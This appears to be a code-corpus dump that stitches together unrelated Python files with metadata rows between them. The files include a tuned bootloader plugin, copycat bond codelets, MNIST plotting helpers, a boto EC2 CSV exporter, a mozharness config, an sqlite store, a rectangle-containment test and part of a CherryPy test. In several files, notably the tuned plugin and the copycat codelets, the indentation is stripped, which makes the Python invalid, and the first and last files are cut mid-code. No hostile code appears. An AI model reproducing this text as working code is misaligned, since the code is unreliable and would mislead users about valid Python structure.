return grub2_cfg
def _grub2_default_env_patch(self):
grub2_default_env = self._cmd.read_file(consts.GRUB2_DEFAULT_ENV_FILE)
if len(grub2_default_env) <= 0:
log.info("cannot read '%s'" % consts.GRUB2_DEFAULT_ENV_FILE)
return False
d = {"GRUB_CMDLINE_LINUX_DEFAULT" : consts.GRUB2_TUNED_VAR, "GRUB_INITRD_OVERLAY" : consts.GRUB2_TUNED_INITRD_VAR}
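		# make sure the grub default environment file expands the tuned variables so that
		# a regenerated grub.cfg (e.g. from grub2-mkconfig) keeps the tuned parameters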
write = False
for i in d:
if re.search(r"^[^#]*\b" + i + r"\s*=.*\\\$" + d[i] + r"\b.*$", grub2_default_env, flags = re.MULTILINE) is None:
write = True
if grub2_default_env[-1] != "\n":
grub2_default_env += "\n"
grub2_default_env += i + "=\"${" + i + ":+$" + i + r" }\$" + d[i] + "\"\n"
if write:
log.debug("patching '%s'" % consts.GRUB2_DEFAULT_ENV_FILE)
self._cmd.write_to_file(consts.GRUB2_DEFAULT_ENV_FILE, grub2_default_env)
return True
def _grub2_cfg_patch(self, d):
log.debug("patching grub.cfg")
if not self._grub2_cfg_file_names:
log.info("cannot find grub.cfg to patch")
return False
for f in self._grub2_cfg_file_names:
grub2_cfg = self._cmd.read_file(f)
if len(grub2_cfg) <= 0:
log.info("cannot patch %s" % f)
continue
log.debug("adding boot command line parameters to '%s'" % f)
grub2_cfg_new = grub2_cfg
patch_initial = False
for opt in d:
(grub2_cfg_new, nsubs) = re.subn(r"\b(set\s+" + opt + "\s*=).*$", r"\1" + "\"" + d[opt] + "\"", grub2_cfg_new, flags = re.MULTILINE)
if nsubs < 1 or re.search(r"\$" + opt, grub2_cfg, flags = re.MULTILINE) is None:
patch_initial = True
# workaround for rhbz#1442117
if len(re.findall(r"\$" + consts.GRUB2_TUNED_VAR, grub2_cfg, flags = re.MULTILINE)) != \
len(re.findall(r"\$" + consts.GRUB2_TUNED_INITRD_VAR, grub2_cfg, flags = re.MULTILINE)):
patch_initial = True
if patch_initial:
grub2_cfg_new = self._grub2_cfg_patch_initial(self._grub2_cfg_unpatch(grub2_cfg), d)
self._cmd.write_to_file(f, grub2_cfg_new)
self._grub2_default_env_patch()
return True
def _grub2_update(self):
self._grub2_cfg_patch({consts.GRUB2_TUNED_VAR : self._cmdline_val, consts.GRUB2_TUNED_INITRD_VAR : self._initrd_val})
self._patch_bootcmdline({consts.BOOT_CMDLINE_TUNED_VAR : self._cmdline_val, consts.BOOT_CMDLINE_INITRD_ADD_VAR : self._initrd_val})
def _has_bls(self):
return os.path.exists(consts.BLS_ENTRIES_PATH)
def _update_grubenv(self, d):
log.debug("updating grubenv, setting %s" % str(d));
l = ["%s=%s" % (str(option), str(value)) for option, value in d.items()]
(rc, out) = self._cmd.execute(["grub2-editenv", "-", "set"] + l)
if rc != 0:
log.warn("cannot update grubenv: '%s'" % out)
return False;
return True
def _bls_entries_patch_initial(self):
machine_id = self._cmd.get_machine_id()
if machine_id == "":
return False
log.debug("running kernel update hook '%s' to patch BLS entries" % consts.KERNEL_UPDATE_HOOK_FILE)
(rc, out) = self._cmd.execute([consts.KERNEL_UPDATE_HOOK_FILE, "add"], env = {"KERNEL_INSTALL_MACHINE_ID" : machine_id})
if rc != 0:
log.warn("cannot patch BLS entries: '%s'" % out)
return False
return True
def _bls_update(self):
log.debug("updating BLS")
if self._has_bls() and \
self._update_grubenv({"tuned_params" : self._cmdline_val, "tuned_initrd" : self._initrd_val}) and \
self._bls_entries_patch_initial():
return True
return False
def _init_initrd_dst_img(self, name):
if self._initrd_dst_img_val is None:
self._initrd_dst_img_val = os.path.join(consts.BOOT_DIR, os.path.basename(name))
def _check_petitboot(self):
return os.path.isdir(consts.PETITBOOT_DETECT_DIR)
def _install_initrd(self, img):
if self._check_petitboot():
log.warn("Detected Petitboot which doesn't support initrd overlays. The initrd overlay will be ignored by bootloader.")
log.info("installing initrd image as '%s'" % self._initrd_dst_img_val)
img_name = os.path.basename(self._initrd_dst_img_val)
if not self._cmd.copy(img, self._initrd_dst_img_val):
return False
self.update_grub2_cfg = True
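		# derive the grub-visible path prefix for the initrd overlay from the BOOT_IMAGE=
		# parameter on the currently booted kernel command line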
curr_cmdline = self._cmd.read_file("/proc/cmdline").rstrip()
initrd_grubpath = "/"
lc = len(curr_cmdline)
if lc:
path = re.sub(r"^\s*BOOT_IMAGE=\s*(\S*/).*$", "\\1", curr_cmdline)
if len(path) < lc:
initrd_grubpath = path
self._initrd_val = os.path.join(initrd_grubpath, img_name)
return True
@command_custom("grub2_cfg_file")
def _grub2_cfg_file(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
self._grub2_cfg_file_names = [str(value)]
@command_custom("initrd_dst_img")
def _initrd_dst_img(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
self._initrd_dst_img_val = str(value)
if self._initrd_dst_img_val == "":
return False
if self._initrd_dst_img_val[0] != "/":
self._initrd_dst_img_val = os.path.join(consts.BOOT_DIR, self._initrd_dst_img_val)
@command_custom("initrd_remove_dir")
def _initrd_remove_dir(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
self._initrd_remove_dir = self._cmd.get_bool(value) == "1"
@command_custom("initrd_add_img", per_device = False, priority = 10)
def _initrd_add_img(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
src_img = str(value)
self._init_initrd_dst_img(src_img)
if src_img == "":
return False
if not self._install_initrd(src_img):
return False
@command_custom("initrd_add_dir", per_device = False, priority = 10)
def _initrd_add_dir(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
src_dir = str(value)
self._init_initrd_dst_img(src_dir)
if src_dir == "":
return False
if not os.path.isdir(src_dir):
log.error("error: cannot create initrd image, source directory '%s' doesn't exist" % src_dir)
return False
log.info("generating initrd image from directory '%s'" % src_dir)
(fd, tmpfile) = tempfile.mkstemp(prefix = "tuned-bootloader-", suffix = ".tmp")
log.debug("writing initrd image to temporary file '%s'" % tmpfile)
os.close(fd)
(rc, out) = self._cmd.execute("find . | cpio -co > %s" % tmpfile, cwd = src_dir, shell = True)
log.debug("cpio log: %s" % out)
if rc != 0:
log.error("error generating initrd image")
self._cmd.unlink(tmpfile, no_error = True)
return False
self._install_initrd(tmpfile)
self._cmd.unlink(tmpfile)
if self._initrd_remove_dir:
log.info("removing directory '%s'" % src_dir)
self._cmd.rmtree(src_dir)
@command_custom("cmdline", per_device = False, priority = 10)
def _cmdline(self, enabling, value, verify, ignore_missing):
v = self._variables.expand(self._cmd.unquote(value))
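		# when verifying, only check that all requested parameters are present on the
		# currently running kernel command line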
if verify:
cmdline = self._cmd.read_file("/proc/cmdline")
if len(cmdline) == 0:
return None
cmdline_set = set(cmdline.split())
value_set = set(v.split())
cmdline_intersect = cmdline_set.intersection(value_set)
if cmdline_intersect == value_set:
log.info(consts.STR_VERIFY_PROFILE_VALUE_OK % ("cmdline", str(value_set)))
return True
else:
log.error(consts.STR_VERIFY_PROFILE_VALUE_FAIL % ("cmdline", str(cmdline_intersect), str(value_set)))
return False
if enabling and value is not None:
log.info("installing additional boot command line parameters to grub2")
self.update_grub2_cfg = True
self._cmdline_val = v
def _instance_post_static(self, instance, enabling):
if enabling and self.update_grub2_cfg:
self._grub2_update()
self._bls_update()
self.update_grub2_cfg = False
| gpl-2.0 | -48,616,862,515,739,710 | 36.61516 | 143 | 0.654782 | false |
ajhager/copycat | copycat/coderack/codelets/bond.py | 1 | 10023 | # Copyright (c) 2007-2017 Joseph Hager.
#
# Copycat is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License,
# as published by the Free Software Foundation.
#
# Copycat is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Copycat; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Bond Codelets"""
import copycat.toolbox as toolbox
from copycat.coderack import Codelet
class BondBottomUpScout(Codelet):
"""Choose an object and a neighbor of that object probabilistically by
intra string salience. Choose a bond facet probabilistically by
relevance in the string. Check if there is a bond between the two
descriptors of this facet. Post a bond strength tester codelet with
urgency a function of the degree of association of bonds of the bond
category."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
from_object = workspace.choose_object('intra_string_salience')
to_object = from_object.choose_neighbor()
if not to_object:
return # Fizzle
bond_facet = workspace.choose_bond_facet(from_object, to_object)
if not bond_facet:
return # Fizzle
from_descriptor = from_object.get_descriptor(bond_facet)
to_descriptor = to_object.get_descriptor(bond_facet)
if not from_descriptor or not to_descriptor:
return # Fizzle
bond_category = slipnet.get_bond_category(from_descriptor, to_descriptor)
if not bond_category:
return # Fizzle
return workspace.propose_bond(from_object, to_object, bond_category,
bond_facet, from_descriptor, to_descriptor)
class BondBuilder(Codelet):
    """Attempt to build the proposed bond, fighting with any competitors."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
bond = self.arguments[0]
string = bond.string
from_object = bond.from_object
to_object = bond.to_object
objects = workspace.objects()
if (from_object not in objects) or (to_object not in objects):
return # Fizzle
existing_bond = string.get_existing_bond(bond)
if existing_bond:
existing_bond.bond_category.activation_buffer += workspace.activation
direction_category = existing_bond.direction_category
if direction_category:
direction_category.activation_buffer += workspace.activation
string.remove_proposed_bond(bond)
return # Fizzle
string.remove_proposed_bond(bond)
incompatible_bonds = bond.incompatible_bonds()
if not workspace.fight_it_out(bond, 1, incompatible_bonds, 1):
return # Fizzle
incompatible_groups = workspace.get_common_groups(from_object, to_object)
spans = [group.letter_span() for group in incompatible_groups]
strength = 0 if len(spans) == 0 else max(spans)
if not workspace.fight_it_out(bond, 1, incompatible_groups, strength):
return # Fizzle
incompatible_corrs = []
at_edge = bond.is_leftmost_in_string() or bond.is_rightmost_in_string()
if bond.direction_category and at_edge:
incompatible_corrs = bond.incompatible_correspondences()
if not workspace.fight_it_out(bond, 2, incompatible_corrs, 3):
return # Fizzle
for ibond in incompatible_bonds:
workspace.break_bond(ibond)
for igroup in incompatible_groups:
workspace.break_group(igroup)
for icorrespondence in incompatible_corrs:
workspace.break_correspondence(icorrespondence)
return workspace.build_bond(bond)
class BondStrengthTester(Codelet):
"""Calculate the proposed bond's strength and decide probabilistically
whether to post a bond builder codelet with urgency a function of the
strength."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
bond = self.arguments[0]
bond.update_strengths()
strength = bond.total_strength
probability = strength / 100.0
probability = workspace.temperature_adjusted_probability(probability)
if not toolbox.flip_coin(probability):
bond.string.remove_proposed_bond(bond)
return # Fizzle
bond.proposal_level = 2
bond.from_object_descriptor.activation_buffer += workspace.activation
bond.to_object_descriptor.activation_buffer += workspace.activation
bond.bond_facet.activation_buffer += workspace.activation
return [(BondBuilder([bond]), strength)]
class BondTopDownCategoryScout(Codelet):
"""Choose a string probabilistically by the relevance of the category in
the string and the string's unhappiness. Chooses an object and a neighbor
    of the object in the string probabilistically by intra string salience.
    Choose a bond facet probabilistically by relevance in the string.
Checks if there is a bond of the category between the two descriptors of
the facet, posting a bond strength tester codelet with urgency a function
of the degree of association of bonds of the category."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
category = self.arguments[0]
initial_string = workspace.initial_string
target_string = workspace.target_string
i_relevance = initial_string.local_bond_category_relevance(category)
t_relevance = target_string.local_bond_category_relevance(category)
i_unhappiness = initial_string.intra_string_unhappiness
t_unhappiness = target_string.intra_string_unhappiness
values = [round(toolbox.average(i_relevance, i_unhappiness)),
round(toolbox.average(t_relevance, t_unhappiness))]
string = toolbox.weighted_select(values, [initial_string, target_string])
obj = string.get_random_object('intra_string_salience')
neighbor = obj.choose_neighbor()
if neighbor is None:
return # Fizzle
facet = workspace.choose_bond_facet(obj, neighbor)
if facet is None:
return # Fizzle
object_descriptor = obj.get_descriptor(facet)
neighbor_descriptor = neighbor.get_descriptor(facet)
if object_descriptor is None or neighbor_descriptor is None:
return # Fizzle
if slipnet.get_bond_category(object_descriptor,
neighbor_descriptor) == category:
from_object = obj
to_object = neighbor
from_descriptor = object_descriptor
to_descriptor = neighbor_descriptor
elif slipnet.get_bond_category(neighbor_descriptor,
object_descriptor) == category:
from_object = neighbor
to_object = obj
from_descriptor = neighbor_descriptor
to_descriptor = object_descriptor
else:
return # Fizzle
return workspace.propose_bond(from_object, to_object, category, facet,
from_descriptor, to_descriptor)
class BondTopDownDirectionScout(Codelet):
"""Choose a string probabilistically by the relevance of the direction
category in the string and the string's unhappiness. Chooses an object
    in the string probabilistically by intra string salience. Chooses a
neighbor of the object in the given direction. Chooses a bond facet
probabilistically by relevance in the string. Checks if there is a
bond of the given direction between the two descriptors of the facet,
posting a bond strength tester codelet with urgency a function of the
degree of association of bonds of the bond category."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
category = self.arguments[0]
initial_string = workspace.initial_string
target_string = workspace.target_string
i_relevance = initial_string.local_direction_category_relevance(category)
t_relevance = target_string.local_direction_category_relevance(category)
i_unhappiness = initial_string.intra_string_unhappiness
t_unhappiness = target_string.intra_string_unhappiness
values = [round(toolbox.average(i_relevance, i_unhappiness)),
round(toolbox.average(t_relevance, t_unhappiness))]
string = toolbox.weighted_select(values, [initial_string, target_string])
obj = string.get_random_object('intra_string_salience')
if category == slipnet.plato_left:
neighbor = obj.choose_left_neighbor()
elif category == slipnet.plato_right:
neighbor = obj.choose_right_neighbor()
if neighbor is None:
return # Fizzle
facet = workspace.choose_bond_facet(obj, neighbor)
if facet is None:
return # Fizzle
object_descriptor = obj.get_descriptor(facet)
neighbor_descriptor = neighbor.get_descriptor(facet)
if object_descriptor is None or neighbor_descriptor is None:
return # Fizzle
bond_category = slipnet.get_bond_category(object_descriptor,
neighbor_descriptor)
if bond_category is None or not bond_category.directed:
return # Fizzle
return workspace.propose_bond(obj, neighbor,
bond_category, facet,
object_descriptor, neighbor_descriptor)
| gpl-2.0 | 1,317,708,017,138,761,200 | 40.589212 | 81 | 0.663474 | false |
jwilliamn/handwritten | modeling/svm/mnist_helpers.py | 1 | 2813 | # Standard scientific Python imports
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
import numpy as np
def show_some_digits(images, targets, sample_size=24, title_text='Digit {}' ):
'''
Visualize random digits in a grid plot
    images - array of flattened digit images, one 32x32 image (1024 values) per row
targets - final labels
'''
nsamples=sample_size
rand_idx = np.random.choice(images.shape[0],nsamples)
images_and_labels = list(zip(images[rand_idx], targets[rand_idx]))
img = plt.figure(1, figsize=(15, 12), dpi=160)
for index, (image, label) in enumerate(images_and_labels):
        plt.subplot(int(np.ceil(nsamples / 6.0)), 6, index + 1)
plt.axis('off')
        # each image is flat; reshape it back to a 2D 32x32 array before plotting
plt.imshow(image.reshape(32,32), cmap=plt.cm.gray_r, interpolation='nearest')
plt.title(title_text.format(label))
def plot_confusion_matrix(cm, title='Confusion matrix', cmap=plt.cm.Blues):
"""
Plots confusion matrix,
cm - confusion matrix
"""
plt.figure(1, figsize=(15, 12), dpi=160)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
class MidpointNormalize(Normalize):
def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):
self.midpoint = midpoint
Normalize.__init__(self, vmin, vmax, clip)
def __call__(self, value, clip=None):
x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]
return np.ma.masked_array(np.interp(value, x, y))
def plot_param_space_scores(scores, C_range, gamma_range):
"""
Draw heatmap of the validation accuracy as a function of gamma and C
Parameters
----------
scores - 2D numpy array with accuracies
"""
#
# The score are encoded as colors with the hot colormap which varies from dark
# red to bright yellow. As the most interesting scores are all located in the
# 0.92 to 0.97 range we use a custom normalizer to set the mid-point to 0.92 so
# as to make it easier to visualize the small variations of score values in the
# interesting range while not brutally collapsing all the low score values to
# the same color.
plt.figure(figsize=(8, 6))
plt.subplots_adjust(left=.2, right=0.95, bottom=0.15, top=0.95)
plt.imshow(scores, interpolation='nearest', cmap=plt.cm.jet,
norm=MidpointNormalize(vmin=0.5, midpoint=0.9))
plt.xlabel('gamma')
plt.ylabel('C')
plt.colorbar()
plt.xticks(np.arange(len(gamma_range)), gamma_range, rotation=45)
plt.yticks(np.arange(len(C_range)), C_range)
plt.title('Validation accuracy')
plt.show()
| gpl-3.0 | 1,047,688,784,952,043,300 | 32.105882 | 85 | 0.648774 | false |
bw57899/aws-command-line-cli | ec2.export.csv.py | 1 | 1212 | #!/usr/bin/env python
# Based on the script found here: http://cloudbuzz.wordpress.com/2011/02/15/336/
import boto.ec2
csv_file = open('instances.csv','w+')
def process_instance_list(connection):
map(build_instance_list,connection.get_all_instances())
def build_instance_list(reservation):
map(write_instances,reservation.instances)
def write_instances(instance):
environment = '-'
if 'environment' in instance.tags:
environment = instance.tags['environment']
# For more parameters to the boto.ec2.instance.Instance object, see here: http://boto.readthedocs.org/en/latest/ref/ec2.html#module-boto.ec2.instance
# In our case, we use the "environment" tag to distinguish between dev/staging/prod instances.
csv_file.write("%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\n"%(instance.id,instance.tags['Name'],environment,instance.private_ip_address,
instance.state,instance.placement,instance.architecture, instance.vpc_id, instance.kernel, instance.instance_type, instance.image_id, instance.launch_time))
csv_file.flush()
# You need to change the region name.
if __name__=="__main__":
connection = boto.ec2.connect_to_region('eu-west-1')
process_instance_list(connection)
csv_file.close()
| gpl-2.0 | 4,554,851,283,583,734,000 | 36.875 | 160 | 0.735974 | false |
Yukarumya/Yukarum-Redfoxes | testing/mozharness/configs/single_locale/win32.py | 1 | 2898 | import os
import sys
config = {
"platform": "win32",
"stage_product": "firefox",
"update_platform": "WINNT_x86-msvc",
"mozconfig": "%(branch)s/browser/config/mozconfigs/win32/l10n-mozconfig",
"bootstrap_env": {
"MOZ_OBJDIR": "obj-l10n",
"EN_US_BINARY_URL": "%(en_us_binary_url)s",
"LOCALE_MERGEDIR": "%(abs_merge_dir)s",
"MOZ_UPDATE_CHANNEL": "%(update_channel)s",
"DIST": "%(abs_objdir)s",
"L10NBASEDIR": "../../l10n",
"MOZ_MAKE_COMPLETE_MAR": "1",
"PATH": 'C:\\mozilla-build\\nsis-3.0b1;'
'%s' % (os.environ.get('path')),
'TOOLTOOL_CACHE': '/c/builds/tooltool_cache',
'TOOLTOOL_HOME': '/c/builds',
},
"ssh_key_dir": "~/.ssh",
"log_name": "single_locale",
"objdir": "obj-l10n",
"js_src_dir": "js/src",
"vcs_share_base": "c:/builds/hg-shared",
# tooltool
'tooltool_url': 'https://api.pub.build.mozilla.org/tooltool/',
'tooltool_script': [sys.executable,
'C:/mozilla-build/tooltool.py'],
'tooltool_bootstrap': "setup.sh",
'tooltool_manifest_src': 'browser/config/tooltool-manifests/win32/releng.manifest',
# balrog credential file:
'balrog_credentials_file': 'oauth.txt',
# l10n
"ignore_locales": ["en-US", "ja-JP-mac"],
"l10n_dir": "l10n",
"locales_file": "%(branch)s/browser/locales/all-locales",
"locales_dir": "browser/locales",
"hg_l10n_tag": "default",
"merge_locales": True,
# MAR
"previous_mar_dir": "dist\\previous",
"current_mar_dir": "dist\\current",
"update_mar_dir": "dist\\update", # sure?
"previous_mar_filename": "previous.mar",
"current_work_mar_dir": "current.work",
"package_base_dir": "dist\\l10n-stage",
"application_ini": "application.ini",
"buildid_section": 'App',
"buildid_option": "BuildID",
"unpack_script": "tools\\update-packaging\\unwrap_full_update.pl",
"incremental_update_script": "tools\\update-packaging\\make_incremental_update.sh",
"balrog_release_pusher_script": "scripts\\updates\\balrog-release-pusher.py",
"update_packaging_dir": "tools\\update-packaging",
"local_mar_tool_dir": "dist\\host\\bin",
"mar": "mar.exe",
"mbsdiff": "mbsdiff.exe",
"current_mar_filename": "firefox-%(version)s.%(locale)s.win32.complete.mar",
"complete_mar": "firefox-%(version)s.en-US.win32.complete.mar",
"localized_mar": "firefox-%(version)s.%(locale)s.win32.complete.mar",
"partial_mar": "firefox-%(version)s.%(locale)s.win32.partial.%(from_buildid)s-%(to_buildid)s.mar",
'installer_file': "firefox-%(version)s.en-US.win32.installer.exe",
# use mozmake?
"enable_mozmake": True,
'exes': {
'python2.7': sys.executable,
'virtualenv': [
sys.executable,
'c:/mozilla-build/buildbotve/virtualenv.py'
],
}
}
| mpl-2.0 | 5,594,327,648,804,923,000 | 36.636364 | 102 | 0.597308 | false |
yuvipanda/edit-stats | dmz/store.py | 1 | 3209 | """Implements a db backed storage area for intermediate results"""
import sqlite3
class Store(object):
"""
Represents an sqlite3 backed storage area that's vaguely key value
modeled for intermediate storage about metadata / data for metrics
about multiple wikis that have some underlying country related basis
"""
_initial_sql_ = [
'CREATE TABLE IF NOT EXISTS meta (key, value);',
'CREATE UNIQUE INDEX IF NOT EXISTS meta_key ON meta(key);',
'CREATE TABLE IF NOT EXISTS wiki_meta (wiki, key, value);',
'CREATE UNIQUE INDEX IF NOT EXISTS wiki_meta_key ON wiki_meta(wiki, key);',
'CREATE TABLE IF NOT EXISTS country_info (wiki, country, key, value);',
'CREATE UNIQUE INDEX IF NOT EXISTS country_info_key ON country_info(wiki, country, key);'
]
def __init__(self, path):
"""Initialize a store at the given path.
Creates the tables required if they do not exist"""
self.db = sqlite3.connect(path)
for sql in Store._initial_sql_:
self.db.execute(sql)
def set_meta(self, key, value):
"""Set generic metadata key value, global to the store"""
self.db.execute("INSERT OR REPLACE INTO meta VALUES (?, ?)", (key, value))
self.db.commit()
def get_meta(self, key):
"""Get generic metadata key value, global to the store"""
try:
cur = self.db.cursor()
cur.execute("SELECT value from meta WHERE key = ?", (key, ))
            row = cur.fetchone()
            return row[0] if row else None
finally:
cur.close()
def set_wiki_meta(self, wiki, key, value):
"""Set wiki specific meta key value"""
self.db.execute("INSERT OR REPLACE INTO wiki_meta VALUES (?, ?, ?)", (wiki, key, value))
self.db.commit()
    def get_wiki_meta(self, wiki, key):
"""Get wiki specific meta key value"""
try:
cur = self.db.cursor()
cur.execute("SELECT value from wiki_meta WHERE wiki = ? AND key = ?", (wiki, key, ))
            row = cur.fetchone()
            return row[0] if row else None
finally:
cur.close()
def set_country_info(self, wiki, country, key, value):
"""Set a country and wiki specific key and value"""
self.db.execute("INSERT OR REPLACE INTO country_info VALUES (?, ?, ?, ?)", (wiki, country, key, value))
self.db.commit()
def set_country_info_bulk(self, wiki, key, country_dict):
"""Bulk insert a dictionary of country specific key and value.
The dictionary should be of form {'country': 'value'}
"""
insert_data = [(wiki, k, key, v) for (k, v) in country_dict.iteritems()]
self.db.executemany("INSERT OR REPLACE INTO country_info VALUES (?, ?, ?, ?)", insert_data)
self.db.commit()
def get_country_info(self, wiki, country, key):
"""Get a country and wiki specific value for a given key"""
try:
cur = self.db.cursor()
cur.execute("SELECT value from country_info WHERE wiki = ? AND country = ?AND key = ?",
(wiki, country, key, ))
            row = cur.fetchone()
            return row[0] if row else None
finally:
cur.close()
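

# Illustrative usage sketch (editor's addition, not part of the original
# module); the database path, wiki name and key names below are assumptions
# chosen only to show how the Store API fits together.
if __name__ == '__main__':
    store = Store('/tmp/edit_stats.sqlite')
    store.set_meta('last_run', '2014-01-01')
    store.set_wiki_meta('enwiki', 'dump_date', '20140101')
    store.set_country_info_bulk('enwiki', 'edit_count', {'US': 100, 'DE': 42})
    print(store.get_country_info('enwiki', 'US', 'edit_count'))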
| mit | 910,942,427,203,685,800 | 38.134146 | 111 | 0.587722 | false |
jskye/car-classifier-research | src/hyp.verification.tools/py/test/test.py | 1 | 3773 | __author__ = 'juliusskye'
import os, sys
sys.path.append('..')
from py.Rectangle import Rectangle
from py.CompareRectangles import CompareRectangles
# things = [0,1,2,3,4,5]
# for thing in things:
#
# if thing>2:
# print(str(thing) + ' is greater than two')
# break
# else: 'no things greater than two'
# det_jaccard_index = 50
# sw_jaccard_index = 100
# print("hypothesis_JI: {0}, slidingwindow_JI: {1}".format(det_jaccard_index, sw_jaccard_index))
# x=[0,0,0,1]
# print(not any(x))
# imageDir = "this.noisy"
# if imageDir[-5:] == "noisy":
# noisytest = True
# print("noisytest: "+str(noisytest))
import numpy as np
import cv2
import copy
JI_THRESH = 0.35
debugging = False  # set True for verbose output in the containment checks below
# r1 = cv2.rectangle((0,0),(100,100))
# r2 = cv2.rectangle((20,20),(40,40))
r1 = (0,0,100,100)
r2 = (20,20,40,40)
r3 = (40,40,80,80)
r4 = (10,10,10,10)
r5 = (20,20,10,10)
detected_objects = []
# print(detected_objects)
detected_objects = [r1,r2,r3,r4,r5]
# detected_objects.append(r1)
# detected_objects.append(r2)
# detected_objects.append(r3)
# detected_objects.append(r4)
# detected_objects.append(r5)
detected_numpy = np.array(detected_objects)
detected_objects_clone = detected_numpy
print(detected_objects_clone)
# get rid of hypotheses that are contained inside others
# because ... there shouldnt be a car within a car...
# detected_objects_clone = copy.copy(detected_objects)
iterations = int(len(detected_objects_clone))-1
for this_index, this_detected_object in enumerate(detected_objects_clone[:-1]):
# use the opencv returned rectangle and create our own.
this_detected_rect = Rectangle(this_detected_object[0], this_detected_object[1], this_detected_object[2], this_detected_object[3])
print("this index (before second loop) is: {0}".format(this_index))
# compare with those in front of this index.
for that_index in range((this_index+1), len(detected_objects_clone)):
# print(detected_objects_clone)
# print("that index (before we get object) is: {0}".format(that_index))
if that_index >= len(detected_objects_clone):
break
that_detected_object = detected_objects_clone[that_index]
that_detected_rect = Rectangle(that_detected_object[0], that_detected_object[1], that_detected_object[2], that_detected_object[3])
# get comparison of this and that rectangle.
comparison_hypotheses = CompareRectangles(this_detected_rect, that_detected_rect, JI_THRESH)
# print("this index is: {0}".format(this_index))
# print("this rect is: {0}".format(this_detected_rect))
# print("that index is: {0}".format(that_index))
# print("that rect is: {0}".format(that_detected_rect))
# if one of them is contained.
if comparison_hypotheses.is_full_containment():
# keep the container and remove the contained.
contained = comparison_hypotheses.rect_fully_contained()
print("contained is: {0}".format(contained))
print("this detected rect is: {0}".format(this_detected_rect))
print("that detected rect is: {0}".format(that_detected_rect))
# determine which is the contained.
print(contained == this_detected_rect)
print(contained == that_detected_rect)
if contained == this_detected_rect:
# detected_objects_clone.pop(this_index)
detected_objects_clone = np.delete(detected_objects_clone, this_index, 0)
print("this rect is contained. removed this rectangle.")
elif contained == that_detected_rect:
# detected_objects_clone.delete(that_index)
detected_objects_clone = np.delete(detected_objects_clone, that_index, 0)
print("that rect is contained. removed that rectangle")
else:
pass
if debugging:
print("hypothese not contained")
# set resultant clone as the new list with contained hypotheses removed.
detected_objects = detected_objects_clone
print(detected_objects_clone)
| mit | 3,068,737,828,676,781,600 | 33.614679 | 132 | 0.708985 | false |
cherrypy/cherrypy | cherrypy/test/test_tools.py | 1 | 17851 | """Test the various means of instantiating and invoking tools."""
import gzip
import io
import sys
import time
import types
import unittest
import operator
from http.client import IncompleteRead
import cherrypy
from cherrypy import tools
from cherrypy._cpcompat import ntou
from cherrypy.test import helper, _test_decorators
*PY_VER_MINOR, _ = PY_VER_PATCH = sys.version_info[:3]
# Refs:
# bugs.python.org/issue39389
# docs.python.org/3.7/whatsnew/changelog.html#python-3-7-7-release-candidate-1
# docs.python.org/3.8/whatsnew/changelog.html#python-3-8-2-release-candidate-1
HAS_GZIP_COMPRESSION_HEADER_FIXED = PY_VER_PATCH >= (3, 8, 2) or (
PY_VER_MINOR == (3, 7) and PY_VER_PATCH >= (3, 7, 7)
)
timeout = 0.2
europoundUnicode = ntou('\x80\xa3')
# Client-side code #
class ToolTests(helper.CPWebCase):
@staticmethod
def setup_server():
# Put check_access in a custom toolbox with its own namespace
myauthtools = cherrypy._cptools.Toolbox('myauth')
def check_access(default=False):
if not getattr(cherrypy.request, 'userid', default):
raise cherrypy.HTTPError(401)
myauthtools.check_access = cherrypy.Tool(
'before_request_body', check_access)
def numerify():
def number_it(body):
for chunk in body:
for k, v in cherrypy.request.numerify_map:
chunk = chunk.replace(k, v)
yield chunk
cherrypy.response.body = number_it(cherrypy.response.body)
class NumTool(cherrypy.Tool):
def _setup(self):
def makemap():
m = self._merged_args().get('map', {})
cherrypy.request.numerify_map = list(m.items())
cherrypy.request.hooks.attach('on_start_resource', makemap)
def critical():
cherrypy.request.error_response = cherrypy.HTTPError(
502).set_response
critical.failsafe = True
cherrypy.request.hooks.attach('on_start_resource', critical)
cherrypy.request.hooks.attach(self._point, self.callable)
tools.numerify = NumTool('before_finalize', numerify)
# It's not mandatory to inherit from cherrypy.Tool.
class NadsatTool:
def __init__(self):
self.ended = {}
self._name = 'nadsat'
def nadsat(self):
def nadsat_it_up(body):
for chunk in body:
chunk = chunk.replace(b'good', b'horrorshow')
chunk = chunk.replace(b'piece', b'lomtick')
yield chunk
cherrypy.response.body = nadsat_it_up(cherrypy.response.body)
nadsat.priority = 0
def cleanup(self):
# This runs after the request has been completely written out.
cherrypy.response.body = [b'razdrez']
id = cherrypy.request.params.get('id')
if id:
self.ended[id] = True
cleanup.failsafe = True
def _setup(self):
cherrypy.request.hooks.attach('before_finalize', self.nadsat)
cherrypy.request.hooks.attach('on_end_request', self.cleanup)
tools.nadsat = NadsatTool()
def pipe_body():
cherrypy.request.process_request_body = False
clen = int(cherrypy.request.headers['Content-Length'])
cherrypy.request.body = cherrypy.request.rfile.read(clen)
# Assert that we can use a callable object instead of a function.
class Rotator(object):
def __call__(self, scale):
r = cherrypy.response
r.collapse_body()
r.body = [bytes([(x + scale) % 256 for x in r.body[0]])]
